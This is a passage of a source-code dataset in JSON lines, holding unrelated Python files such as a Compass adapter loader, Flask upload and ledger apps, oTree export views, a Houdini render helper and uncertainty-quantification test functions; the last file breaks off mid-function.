except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Adapter related database operations.\"\"\"\nimport logging\nimport re\n\nfrom compass.db.api import database\nfrom compass.db.api import utils\nfrom compass.db import exception\nfrom compass.db import models\n\nfrom compass.utils import setting_wrapper as setting\nfrom compass.utils import util\n\n\nOSES = None\nOS_INSTALLERS = None\nPACKAGE_INSTALLERS = None\nADAPTERS = None\nADAPTERS_FLAVORS = None\nADAPTERS_ROLES = None\n\n\ndef _get_oses_from_configuration():\n \"\"\"Get all os configs from os configuration dir.\n\n Example: {\n <os_name>: {\n 'name': <os_name>,\n 'id': <os_name>,\n 'os_id': <os_name>,\n 'deployable': True\n }\n }\n \"\"\"\n configs = util.load_configs(setting.OS_DIR)\n systems = {}\n for config in configs:\n logging.info('get config %s', config)\n system_name = config['NAME']\n parent_name = config.get('PARENT', None)\n system = {\n 'name': system_name,\n 'id': system_name,\n 'os_id': system_name,\n 'parent': parent_name,\n 'parent_id': parent_name,\n 'deployable': config.get('DEPLOYABLE', False)\n }\n systems[system_name] = system\n parents = {}\n for name, system in systems.items():\n parent = system.get('parent', None)\n parents[name] = parent\n for name, system in systems.items():\n util.recursive_merge_dict(name, systems, parents)\n return systems\n\n\ndef _get_installers_from_configuration(configs):\n \"\"\"Get installers from configurations.\n\n Example: {\n <instance_name>: {\n 'alias': <instance_name>,\n 'id': <instance_name>,\n 'name': <name>,\n 'settings': <installer settings dict>\n }\n }\n \"\"\"\n installers = {}\n for config in configs:\n name = config['NAME']\n instance_name = config.get('INSTANCE_NAME', name)\n installers[instance_name] = {\n 'alias': instance_name,\n 'id': instance_name,\n 'name': name,\n 'settings': config.get('SETTINGS', {})\n }\n return installers\n\n\ndef _get_os_installers_from_configuration():\n \"\"\"Get os installers from os installer config dir.\"\"\"\n configs = util.load_configs(setting.OS_INSTALLER_DIR)\n return _get_installers_from_configuration(configs)\n\n\ndef 
_get_package_installers_from_configuration():\n \"\"\"Get package installers from package installer config dir.\"\"\"\n configs = util.load_configs(setting.PACKAGE_INSTALLER_DIR)\n return _get_installers_from_configuration(configs)\n\n\ndef _get_adapters_from_configuration():\n \"\"\"Get adapters from adapter config dir.\"\"\"\n configs = util.load_configs(setting.ADAPTER_DIR)\n adapters = {}\n for config in configs:\n logging.info('add config %s to adapter', config)\n if 'OS_INSTALLER' in config:\n os_installer = OS_INSTALLERS[config['OS_INSTALLER']]\n else:\n os_installer = None\n\n if 'PACKAGE_INSTALLER' in config:\n package_installer = PACKAGE_INSTALLERS[\n config['PACKAGE_INSTALLER']\n ]\n else:\n package_installer = None\n\n adapter_name = config['NAME']\n parent_name = config.get('PARENT', None)\n adapter = {\n 'name': adapter_name,\n 'id': adapter_name,\n 'parent': parent_name,\n 'parent_id': parent_name,\n 'display_name': config.get('DISPLAY_NAME', adapter_name),\n 'os_installer': os_installer,\n 'package_installer': package_installer,\n 'deployable': config.get('DEPLOYABLE', False),\n 'health_check_cmd': config.get('HEALTH_CHECK_COMMAND', None),\n 'supported_oses': [],\n 'roles': [],\n 'flavors': []\n }\n supported_os_patterns = [\n re.compile(supported_os_pattern)\n for supported_os_pattern in config.get('SUPPORTED_OS_PATTERNS', [])\n ]\n for os_name, os in OSES.items():\n if not os.get('deployable', False):\n continue\n for supported_os_pattern in supported_os_patterns:\n if supported_os_pattern.match(os_name):\n adapter['supported_oses'].append(os)\n break\n adapters[adapter_name] = adapter\n\n parents = {}\n for name, adapter in adapters.items():\n parent = adapter.get('parent', None)\n parents[name] = parent\n for name, adapter in adapters.items():\n util.recursive_merge_dict(name, adapters, parents)\n return adapters\n\n\ndef _add_roles_from_configuration():\n \"\"\"Get roles from roles config dir and update to adapters.\"\"\"\n configs = util.load_configs(setting.ADAPTER_ROLE_DIR)\n for config in configs:\n logging.info(\n 'add config %s to role', config\n )\n adapter_name = config['ADAPTER_NAME']\n adapter = ADAPTERS[adapter_name]\n adapter_roles = ADAPTERS_ROLES.setdefault(adapter_name, {})\n for role_dict in config['ROLES']:\n role_name = role_dict['role']\n display_name = role_dict.get('display_name', role_name)\n adapter_roles[role_name] = {\n 'name': role_name,\n 'id': '%s:%s' % (adapter_name, role_name),\n 'adapter_id': adapter_name,\n 'adapter_name': adapter_name,\n 'display_name': display_name,\n 'description': role_dict.get('description', display_name),\n 'optional': role_dict.get('optional', False)\n }\n parents = {}\n for name, adapter in ADAPTERS.items():\n parent = adapter.get('parent', None)\n parents[name] = parent\n for adapter_name, adapter_roles in ADAPTERS_ROLES.items():\n util.recursive_merge_dict(adapter_name, ADAPTERS_ROLES, parents)\n for adapter_name, adapter_roles in ADAPTERS_ROLES.items():\n adapter = ADAPTERS[adapter_name]\n adapter['roles'] = adapter_roles.values()\n\n\ndef _add_flavors_from_configuration():\n \"\"\"Get flavors from flavor config dir and update to adapters.\"\"\"\n configs = util.load_configs(setting.ADAPTER_FLAVOR_DIR)\n for config in configs:\n logging.info('add config %s to flavor', config)\n adapter_name = config['ADAPTER_NAME']\n adapter = ADAPTERS[adapter_name]\n adapter_flavors = ADAPTERS_FLAVORS.setdefault(adapter_name, {})\n adapter_roles = ADAPTERS_ROLES[adapter_name]\n for flavor_dict in config['FLAVORS']:\n 
flavor_name = flavor_dict['flavor']\n flavor_id = '%s:%s' % (adapter_name, flavor_name)\n flavor = {\n 'name': flavor_name,\n 'id': flavor_id,\n 'adapter_id': adapter_name,\n 'adapter_name': adapter_name,\n 'display_name': flavor_dict.get('display_name', flavor_name),\n 'template': flavor_dict.get('template', None)\n }\n flavor_roles = flavor_dict.get('roles', [])\n roles_in_flavor = []\n for flavor_role in flavor_roles:\n if isinstance(flavor_role, basestring):\n role_name = flavor_role\n role_in_flavor = {\n 'name': role_name,\n 'flavor_id': flavor_id\n }\n else:\n role_in_flavor = flavor_role\n role_in_flavor['flavor_id'] = flavor_id\n if 'role' in role_in_flavor:\n role_in_flavor['name'] = role_in_flavor['role']\n del role_in_flavor['role']\n role_name = role_in_flavor['name']\n role = adapter_roles[role_name]\n util.merge_dict(role_in_flavor, role, override=False)\n roles_in_flavor.append(role_in_flavor)\n flavor['roles'] = roles_in_flavor\n adapter_flavors[flavor_name] = flavor\n parents = {}\n for name, adapter in ADAPTERS.items():\n parent = adapter.get('parent', None)\n parents[name] = parent\n for adapter_name, adapter_roles in ADAPTERS_FLAVORS.items():\n util.recursive_merge_dict(adapter_name, ADAPTERS_FLAVORS, parents)\n for adapter_name, adapter_flavors in ADAPTERS_FLAVORS.items():\n adapter = ADAPTERS[adapter_name]\n adapter['flavors'] = adapter_flavors.values()\n\n\ndef load_adapters_internal(force_reload=False):\n \"\"\"Load adapter related configurations into memory.\n\n If force_reload, reload all configurations even it is loaded already.\n \"\"\"\n global OSES\n if force_reload or OSES is None:\n OSES = _get_oses_from_configuration()\n global OS_INSTALLERS\n if force_reload or OS_INSTALLERS is None:\n OS_INSTALLERS = _get_os_installers_from_configuration()\n global PACKAGE_INSTALLERS\n if force_reload or PACKAGE_INSTALLERS is None:\n PACKAGE_INSTALLERS = _get_package_installers_from_configuration()\n global ADAPTERS\n if force_reload or ADAPTERS is None:\n ADAPTERS = _get_adapters_from_configuration()\n global ADAPTERS_ROLES\n if force_reload or ADAPTERS_ROLES is None:\n ADAPTERS_ROLES = {}\n _add_roles_from_configuration()\n global ADAPTERS_FLAVORS\n if force_reload or ADAPTERS_FLAVORS is None:\n ADAPTERS_FLAVORS = {}\n _add_flavors_from_configuration()\n\n\ndef get_adapters_internal(force_reload=False):\n \"\"\"Get all deployable adapters.\"\"\"\n load_adapters_internal(force_reload=force_reload)\n adapter_mapping = {}\n for adapter_name, adapter in ADAPTERS.items():\n if adapter.get('deployable'):\n # TODO(xicheng): adapter should be filtered before\n # return to caller.\n adapter_mapping[adapter_name] = adapter\n else:\n logging.info(\n 'ignore adapter %s since it is not deployable',\n adapter_name\n )\n return adapter_mapping\n\n\ndef get_flavors_internal(force_reload=False):\n \"\"\"Get all deployable flavors.\"\"\"\n load_adapters_internal(force_reload=force_reload)\n adapter_flavor_mapping = {}\n for adapter_name, adapter_flavors in ADAPTERS_FLAVORS.items():\n adapter = ADAPTERS.get(adapter_name, {})\n for flavor_name, flavor in adapter_flavors.items():\n if adapter.get('deployable'):\n # TODO(xicheng): flavor dict should be filtered before\n # return to caller.\n adapter_flavor_mapping.setdefault(\n adapter_name, {}\n )[flavor_name] = flavor\n else:\n logging.info(\n 'ignore adapter %s since it is not deployable',\n adapter_name\n )\n\n return 
adapter_flavor_mapping\n","sub_path":"compass/db/api/adapter.py","file_name":"adapter.py","file_ext":"py","file_size_in_byte":11409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"326566230","text":"from flask import Flask, redirect, url_for, render_template, request, flash, make_response\nimport Drive\nimport os\nfrom werkzeug.utils import secure_filename\n\napp = Flask(__name__)\napp.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024\npath = os.getcwd()\napp.config['UPLOAD_FOLDER'] = path\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\ndef filters(data:list, email:str):\n data.pop(0)\n maindt = []\n post = []\n position = 0\n for dt in data:\n if dt[4] == email and not \"imgur.com\" in dt[13] and not 'deals4free.in' in dt[13]:\n maindt.append(dt)\n post.append(f\"{position}\") # post stores the row position (serial number) of each matching entry\n position = position + 1\n return maindt, post\n\n@app.route(\"/\")\ndef indexpage():\n return render_template('index.html')\n\n@app.route(\"/uploadimg\", methods=[\"POST\"])\ndef uploadimg():\n if 'files[]' not in request.files:\n flash('No file part')\n return redirect(request.url)\n ids = request.args.get(\"id\")\n files = request.files.getlist('files[]')\n n = 0\n linkList = []\n for file in files:\n if n > 10:\n break\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n link = Drive.uploadFile(filename)\n if link:\n linkList.append(link) # reuse the returned link instead of uploading the file a second time\n n = n + 1\n else:\n flash(\"This type of file is not supported or file not found\")\n if len(linkList):\n pass\n else:\n flash(\"Error while updating data please contact site owner\")\n cookies = request.cookies.get(\"mail\")\n Drive.updateseq(cookies, linkList, ids)\n return redirect(f'/submitDT?mail={cookies.split(\":\")[0]}')\n\n@app.route(\"/submitDT\")\ndef submitDT():\n mail = request.args.get('mail')\n allData = Drive.getDetails()\n reldt, position = filters(allData, mail)\n # 17, 20, 23, 26, 29, 32, 35, 38, 41, 44\n resp = make_response(render_template('showdata.html', data=reldt))\n resp.set_cookie('mail', f\"{mail}:{position}\") # store the email and the row positions of this user's posts in the cookie\n # the mail and row position from this cookie are checked later 
to locate the record and update its screenshot links\n return resp\n\n@app.route(\"/index.html\")\ndef indexpg():\n return render_template('index.html')\n\nif __name__ == '__main__':\n app.run(debug=True, threaded=True, port=8080)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"545342467","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\n# =============================================================================\n# IMPORTS\n# =============================================================================\n\nimport datetime\n\nfrom django.http import HttpResponse\nfrom django.conf import settings\n\nimport vanilla\n\nimport otree.common_internal\nimport otree.models\nfrom otree.common_internal import app_name_format\n\n\n# =============================================================================\n# VIEWS\n# =============================================================================\n\nclass ExportIndex(vanilla.TemplateView):\n\n template_name = 'otree/export/index.html'\n\n url_pattern = r\"^export/$\"\n\n def get_context_data(self, **kwargs):\n context = super(ExportIndex, self).get_context_data(**kwargs)\n app_labels = settings.INSTALLED_OTREE_APPS\n app_labels_with_data = []\n for app_label in app_labels:\n model_module = otree.common_internal.get_models_module(app_label)\n if model_module.Player.objects.exists():\n app_labels_with_data.append(app_label)\n apps = [\n {\"name\": app_name_format(app_label), \"label\": app_label}\n for app_label in app_labels_with_data\n ]\n context.update({'apps': apps})\n return context\n\n\nclass ExportAppDocs(vanilla.View):\n\n url_pattern = r\"^ExportAppDocs/(?P<app_label>[\\w.]+)/$\"\n\n def _doc_file_name(self, app_label):\n return '{} - documentation ({}).txt'.format(\n otree.common_internal.app_name_format(app_label),\n datetime.date.today().isoformat()\n )\n\n def get(self, request, *args, **kwargs):\n app_label = kwargs['app_label']\n response = HttpResponse(content_type='text/plain')\n response['Content-Disposition'] = 'attachment; filename=\"{}\"'.format(\n self._doc_file_name(app_label)\n )\n otree.common_internal.export_docs(response, app_label)\n return response\n\n\nclass ExportCsv(vanilla.View):\n\n url_pattern = r\"^ExportCsv/(?P<app_label>[\\w.]+)/$\"\n\n def _data_file_name(self, app_label):\n return '{} (accessed {}).csv'.format(\n otree.common_internal.app_name_format(app_label),\n datetime.date.today().isoformat(),\n )\n\n def get(self, request, *args, **kwargs):\n app_label = kwargs['app_label']\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=\"{}\"'.format(\n self._data_file_name(app_label)\n )\n otree.common_internal.export_data(response, app_label)\n return response\n\n\nclass ExportTimeSpent(vanilla.View):\n\n url_pattern = r\"^ExportTimeSpent/$\"\n\n def get(self, request, *args, **kwargs):\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=\"{}\"'.format(\n 'TimeSpent (accessed {}).csv'.format(\n datetime.date.today().isoformat()\n )\n )\n otree.common_internal.export_time_spent(response)\n return response\n","sub_path":"otree-core-master/otree/views/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
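The three oTree export views in the record above all follow one download pattern: build an HttpResponse, set its Content-Disposition header so the browser saves the body as a named file, then stream the payload into the response. A minimal sketch of that pattern follows, assuming Django is installed; `_export_response` and `export_example` are hypothetical helper names for illustration, not part of the oTree API.

# Minimal sketch of the attachment-download pattern used by the export views
# above (assumes Django; `_export_response` and `export_example` are
# hypothetical names, not oTree API).
import csv
import datetime

from django.http import HttpResponse


def _export_response(filename, content_type='text/csv'):
    # The Content-Disposition header tells the browser to save the body
    # as a file instead of rendering it inline.
    response = HttpResponse(content_type=content_type)
    response['Content-Disposition'] = 'attachment; filename="{}"'.format(filename)
    return response


def export_example(rows):
    # HttpResponse is file-like, so csv.writer can stream rows directly into it.
    name = 'Example (accessed {}).csv'.format(datetime.date.today().isoformat())
    response = _export_response(name)
    writer = csv.writer(response)
    for row in rows:
        writer.writerow(row)
    return response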
+{"seq_id":"525770846","text":"#!/usr/bin/python3\n\ndef main():\n\n o_list = [1,2,3,4,5,6]\n\n c_list = [x*x for x in o_list]\n print(\"comprehension list : \",c_list)\n \n c_list = [x for x in o_list if x%2==0]\n print(\"comprehension list with condition(if x%2==0) : \",c_list)\n \n c_list = [x*10 if x<=3 else x*100 for x in o_list]\n print(\"comprehension list with ternary operator(x*10 if x<=3 else x*100) : \",c_list)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"pythonic/comprehension/comprehension_condition.py","file_name":"comprehension_condition.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"334702227","text":"from setuptools import setup, find_packages\n\nwith open(\"README.md\", \"r\") as readme_file:\n readme = readme_file.read()\n\nrequirements = [\"pandas\", \"visdom\", \"torch\", \"torchvision\"]\n\nsetup(\n name=\"AtlasNet\",\n version=\"0.1\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/ThibaultGROUEIX/AtlasNet\",\n packages=['AtlasNet'],\n install_requires=requirements,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"411662988","text":"import mammo_dataset\nimport json\n\n\ninbreast_dir = '/Users/lpires/Developer/dl/INbreast'\noutput_dir = './out'\n\nmds = mammo_dataset.INbreastDataset(inbreast_dir, output_dir)\nmds.read_dicoms()\nmds.read_cases(pathology_filter=[])\n\n# print(mds.cases_df.groupby(['view', 'width', 'height']).size())\n# print()\n\nmds.process_annotations(gen_calc=True,\n gen_mass=True,\n gen_asymmetry=True,\n gen_distortion=True,\n gen_spiculated=True,\n bbox_area_filter=(0))\n\nprint('annotations:', len(mds.annotations_df))\nprint('images:', len(mds.annotations_df.dicom_fn.unique()))\nprint(mds.annotations_df.groupby('category').size())\nprint()\n\nall_images = False\nconvert_dicoms = False\n\nmds.save(all_images=all_images, convert_dicoms=convert_dicoms)\n\n# mds.convert_dicoms()\n\n# mds.prepare_dataset(all_images=all_images)\n# mds.draw_annotations()\n","sub_path":"convert_inbreast.py","file_name":"convert_inbreast.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"198040481","text":"import hou\nimport subprocess\nimport platform\n\ndef getRenderNodes(node):\n \"\"\"\n returns renderable nodes found in children of specified node\n \"\"\"\n render_nodes = (\"rop_geometry\", \"geometry\", \"Redshift_ROP\", \"ifd\", \"arnold\", \"opengl\", \"baketexture::3.0\", \"rib\", \"ris\", \"ribarchive\", \"wren\", \"ifdarchive\", \"render\", \"rop_alembic\", \"brickmap\", \"merge\", \"channel\", \"comp\", \"dsmmerge\", \"fetch\", \"wedge\", \"shell\", \"null\", \"dop\", \"alembic\", \"filmboxfbx\", \"agent\", \"mdd\")\n\n node_type_name = node.type().name()\n node_children = node.allSubChildren()\n\n node_list = []\n\n if node_type_name in render_nodes:\n node_list.append(node)\n return node_list\n elif len(node_children) > 0:\n for n in node_children:\n if n.type().name() in render_nodes:\n node_list.append(n)\n else:\n print(\"No render node was found.\\n\")\n return None\n\n return node_list\n\ndef bg_render(kwargs):\n \"\"\"\n starts a separate houdini process rendering selected node, if multiple nodes were found, then asks user to choose one\n 
\"\"\"\n nodes = hou.selectedNodes()\n\n if not bool( nodes ):\n print(\"No nodes selected.\\n\")\n return\n\n file_path = hou.hipFile.path()\n file_name = hou.hipFile.basename()\n\n for node in nodes:\n top_node = node\n\n node_list = getRenderNodes(node)\n if len(node_list) == 0:\n return\n elif len(node_list) == 1:\n node = node_list[0]\n else:\n node_names = [n.name() for n in node_list]\n selected = hou.ui.selectFromList(choices=node_names, message=\"Multiple ROPs found, choose one to be rendered\", title=\"Choose ROP\")\n if len(selected) == 0:\n print(\"No ROP was selected.\")\n return\n else:\n node = node_list[ selected[0] ]\n\n rop_path = node.path()\n top_node_path = top_node.path()\n\n frame_by_frame = \"\"\n if kwargs[\"altclick\"]:\n frame_by_frame = \"I\"\n\n hscript_cmd = \"render -Va{0} {1}; quit\".format(frame_by_frame, rop_path)\n intro = \"Rendering {0} in {1}\".format(top_node_path, file_name)\n finish = \"Rendering was finished, press [enter] to close terminal.\"\n\n bash_render_cmd = 'hbatch -c \\\\\"{0}\\\\\" {1}'.format(hscript_cmd, file_path)\n \n if platform.system() == \"Linux\":\n p = subprocess.Popen([\"x-terminal-emulator\", \"-t\", intro, \"-e\", 'bash -c \"printf \\\\\"{0}\\\\\" && {1} && printf \\\\\"{2}\\\\\" && read\"'.format(intro + \"\\\\n\\\\n\\\\n\", bash_render_cmd, \"\\\\n\\\\n\" + finish) ], stdout=subprocess.PIPE)\n elif platform.system() == \"Windows\":\n p = subprocess.Popen('start cmd /c \"title {0} &&^echo {0} &&^echo. &&^echo. &&^{1} &&^pause \"'.format(intro, bash_render_cmd.replace(\"\\\\\",\"\")), stdout=subprocess.PIPE, shell=True)\n","sub_path":"scripts/python/bg_render.py","file_name":"bg_render.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"320438501","text":"import urllib.request\nimport urllib.parse\nimport urllib.error\nimport json\n\ndef make_tmdb_api_request(method, api_key, extra_params=None):\n extra_params = extra_params or {}\n url = 'https://api.themoviedb.org/3%s' % method\n params = {\n 'api_key': api_key,\n 'language': 'ru',\n }\n params.update(extra_params)\n return load_json_data_from_url(url, params)\n\ndef load_json_data_from_url(base_url, url_params):\n url = '%s?%s' % (base_url, urllib.parse.urlencode(url_params))\n response = urllib.request.urlopen(url).read().decode('utf-8')\n return json.loads(response)\n\ndef get_user_api_key():\n user_api_key = input('Enter your api key v3:')\n try:\n make_tmdb_api_request(method='/movie/2', api_key = user_api_key)\n return user_api_key\n except urllib.error.HTTPError as err:\n if err.code == 401:\n return None\n else:\n raise\n\n","sub_path":"tmdb_helpers.py","file_name":"tmdb_helpers.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"632510877","text":"#5.2 Write a program that repeatedly prompts a user for integer numbers\n#until the user enters 'done'. Once 'done' is entered, print out the largest\n#and smallest of the numbers. If the user enters anything other than a valid\n#number catch it with a try/except and put out an appropriate message and\n#ignore the number. 
Enter 7, 2, bob, 10, and 4 and match the output below.\n\nlargest = None\nsmallest = None\n\nwhile True:\n user_input = input('Enter an integer: ')\n\n if user_input.lower() == 'done':\n break\n try:\n user_number = int(user_input)\n except:\n print('Invalid input')\n continue\n if largest == None:\n largest = user_number\n elif user_number > largest:\n largest = user_number\n if smallest == None:\n smallest = user_number\n elif user_number < smallest:\n smallest = user_number\nprint(\"Maximum is\",largest)\nprint(\"Minimum is\",smallest)\n","sub_path":"Course 1 Python/ex_05_02.py","file_name":"ex_05_02.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"104400170","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.PostListView.as_view(), name='post-list'),\n path('<int:pk>/', views.PostDetailView.as_view(), name='post-detail'),\n path('create_post/', views.PostCreateView.as_view(), name='create-post')\n]\n\napp_name = 'blog'\n","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"10343942","text":"import pycom\nimport time\n\ndef long_t(color):\n pycom.rgbled(color) # on\n time.sleep(3)\n pycom.rgbled(0) # off\n time.sleep(1)\n\ndef short_t(color):\n pycom.rgbled(color) # on\n time.sleep(1)\n pycom.rgbled(0) # off\n time.sleep(1)\n\ncolors = [0x7f0000,0x007f00]\n\nfor cols in colors: # blink the S-O-S pattern once per color\n for i in range(3):\n short_t(cols)\n for i in range(3):\n long_t(cols)\n for i in range(3):\n short_t(cols)\n","sub_path":"labs/LED/SOS.py","file_name":"SOS.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"5164024","text":"\"\"\"Test capabilities for uncertainty quantification.\n\nThis module contains a host of test models and functions often used in the uncertainty\nquantification literature.\n\n\"\"\"\nimport numpy as np\nimport math\n\n\ndef borehole(x):\n r\"\"\"Borehole function.\n\n The Borehole function models water flow through a borehole. Its simplicity and quick\n evaluation make it a commonly used function for testing a wide variety of methods in\n computer experiments.\n \"\"\"\n assert len(x) == 8\n\n r_w = x[0]\n r = x[1]\n T_u = x[2]\n H_u = x[3]\n T_l = x[4]\n H_l = x[5]\n L = x[6]\n K_w = x[7]\n\n a = 2 * math.pi * T_u * (H_u - H_l)\n b = np.log(r / r_w)\n c = (2 * L * T_u) / (b * r_w ** 2 * K_w)\n d = T_u / T_l\n\n rslt = a / (b * (1 + c + d))\n return rslt\n\n\ndef ishigami(x, a=7, b=0.1):\n r\"\"\"Ishigami function.\n\n The Ishigami function of Ishigami & Homma (1990) is used as an example for uncertainty and\n sensitivity analysis methods, because it exhibits strong nonlinearity and nonmonotonicity.\n \"\"\"\n assert len(x) == 3\n\n rslt = (1 + b * x[2] ** 4) * np.sin(x[0]) + a * np.sin(x[1]) ** 2\n return rslt\n\n\ndef eoq_model(x, r=0.1):\n r\"\"\"Economic order quantity model.\n\n This function computes the optimal economic order quantity (EOQ) based on the model presented in\n [H1990]_. The EOQ minimizes the holding costs as well as ordering costs. The core parameters of\n the model are the units per month `x[0]`, the unit price of items in stock `x[1]`,\n and the setup costs of an order `x[2]`. The annual interest rate `r` is treated as an\n 
The annual interest rate `r` is treated as an\n additional parameter.\n\n Parameters\n ----------\n x : array_like\n Core parameters of the model\n\n r : float, optional\n Annual interest rate\n\n Returns\n -------\n\n float\n Optimal order quantity\n\n Notes\n -----\n\n A historical perspective on the model is provided by [E1990]_. A brief description with the core\n equations is available in [W2020]_.\n\n References\n ----------\n\n .. [H1990] Harris, F. W. (1990).\n How many parts to make at once.\n Operations Research, 38(6), 947–950.\n\n .. [E1990] Erlenkotter, D. (1990).\n Ford Whitman Harris and the economic order quantity model.\n Operations Research, 38(6), 937–946.\n\n .. [W2020] Economic order quantity. (2020, April 3). In Wikipedia.\n Retrieved from\n `https://en.wikipedia.org/w/index.php\\\n ?title=Economic_order_quantity&oldid=948881557 `_\n\n Examples\n --------\n\n >>> x = [1, 2, 3]\n >>> y = eoq_model(x, r=0.1)\n >>> np.testing.assert_almost_equal(y, 18.973665961010276)\n \"\"\"\n\n m, c, s = x\n y = np.sqrt((24 * m * s) / (r * c))\n\n return y\n\n\ndef simple_linear_function(x):\n r\"\"\"Simple linear function.\n\n This function computes the sum of all elements of a given array.\n\n Parameters\n ----------\n x : array_like\n Array of summands\n\n Examples\n --------\n\n >>> x = [1, 2, 3]\n >>> y = simple_linear_function(x)\n >>> np.testing.assert_almost_equal(y, 6)\n \"\"\"\n return sum(x)\n","sub_path":"temfpy/uncertainty_quantification.py","file_name":"uncertainty_quantification.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"282552197","text":"class calculadora:\n \n color = \"blanco\"\n Modelo = \"2020\"\n tipo = \"solar\"\n Marca = \"casio\"\n pantalla=\"chica\"\n\n def __init__(self):\n print(\"constructor calculadora \")\n \n def sumar (self):\n print(\"sumar\")\n\n def restar (self): \n print(\"restar\")\n\nclass calcusolar (calculadora):\n def __init__(self):\n print(\"constructor de calculadora solar\") \n\n def restar (self): \n print(\"restar valores\") \n\nobjeto = calculadora() \nobjeto.sumar()\nobjeto.restar()\nobjeto_solar = calcusolar()\nobjeto_solar.sumar()\nobjeto_solar.restar()\nprint(objeto_solar.color)\nprint(objeto_solar.Modelo)\nprint(objeto_solar.tipo)\nprint(objeto_solar.Marca)\nprint(objeto_solar.pantalla)","sub_path":"semana_4/programa_8.py","file_name":"programa_8.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"444840384","text":"from app import app\nfrom flask import render_template, request, redirect, url_for, flash\nimport csv\nfrom os import remove, rename\nfrom app.forms import CompraForm\n\nficheromovimientos = 'data/movimientos.txt'\nficheronuevo = 'data/nuevomovimientos.txt'\n@app.route('/')\ndef index():\n #leer movimientos\n fMovimientos = open(ficheromovimientos, \"r\")\n csvreader = csv.reader(fMovimientos, delimiter=',', quotechar='\"')\n movements = []\n for movimiento in csvreader: \n movements.append(movimiento)\n #enviar movimientos a index.html\n return render_template('index.html', movimientos=movements)\n\n@app.route('/nuevacompra', methods=['GET', 'POST'])\ndef compra():\n print(request.method)\n form = CompraForm(request.form)\n\n if request.method == 'GET':\n return render_template('nuevacompra.html')\n return render_template('nuevacompra.html', form=form)\n else:\n msg = validar(request.values)\n if msg != True:\n return 
render_template('nuevacompra.html', errores=msg)\n fMovimientos = open(ficheromovimientos, \"a+\")\n precioUnitario = float(request.values['cantidadPagada'])/float(request.values['cantidadComprada'])\n registro = '{},\"{}\",{},{},{},{},{}\\n'.format(request.values['fecha'], \n request.values['concepto'], \n request.values['monedaComprada'], \n request.values['cantidadComprada'], \n request.values['monedaPagada'], \n request.values['cantidadPagada'], \n precioUnitario)\n fMovimientos.write(registro)\n fMovimientos.close()\n return redirect(url_for('index'))\n@app.route('/modificar', methods=['GET', 'POST'])\ndef update():\n \n if request.method == 'GET':\n if request.values.get('ix'):\n movimiento, ix = recuperarregistro(request.values.get('ix'))\n return render_template('update.html', registro_seleccionado=movimiento, ix=ix)\n else:\n if request.values.get('ix'):\n msg = validar(request.values)\n if msg != True:\n registro_seleccionado = [\n request.values['fecha'],\n request.values['concepto'],\n request.values['monedaComprada'],\n request.values['cantidadComprada'],\n request.values['monedaPagada'],\n request.values['cantidadPagada']\n ]\n return render_template('update.html', registro_seleccionado=registro_seleccionado, ix=request.values['ix'], errores=msg)\n \n modificarregistro(request.values)\n return redirect(url_for('index'))\n # recuperar los values\n #grabarlos en la posición adecuada del fichero sustituyendo al registro original (el 3)\n@app.route('/procesarregistro', methods=['POST'])\ndef procesar():\n if request.values.get('ix'):\n if request.values['btnselected'] == 'Borrar':\n borrar(int(request.values['ix']))\n else:\n #modificar(int(request.values['ix']))\n return redirect(url_for('update', ix=request.values['ix']))\n return redirect(url_for('index'))\ndef recuperarregistro(ix):\n ix = int(ix)\n fe = open(ficheromovimientos, 'r')\n csvreader = csv.reader(fe, delimiter=',', quotechar='\"')\n contador = 1\n for linea in csvreader:\n if contador == ix:\n fe.close()\n return linea, ix\n contador += 1\n fe.close()\n \ndef modificarregistro(values):\n 